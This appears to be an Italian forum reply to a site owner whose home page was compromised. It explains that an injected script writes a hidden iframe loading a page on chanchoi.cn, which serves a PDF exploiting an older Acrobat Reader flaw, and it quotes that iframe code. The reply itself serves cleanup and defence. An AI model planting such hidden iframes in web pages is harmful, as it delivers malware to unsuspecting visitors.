Ho reso non cliccabile il link perchè il pdf in questione contiene un exploit che cerca di sfruttare una vulnerabilità di acrobat reader (non vulnerabile solo dalla versione 8.1.2 e successivi) per eseguire codice sulla macchima.

Lo script nel tuo sito scrive nella pagina il seguente codice:

codice:
<div style="visibility:hidden">
<iframe src="http://chanchoi.cn/index.php" visibility:hidden width=100 height=80></iframe>
</div>
Un iframe nascosto che carica la pagina che poi esegue materialmente il download del pdf.

Dovresti cercare di capire come è stata possibile l'iniezione nella tua home page per evitare che questo succeda nuovamente..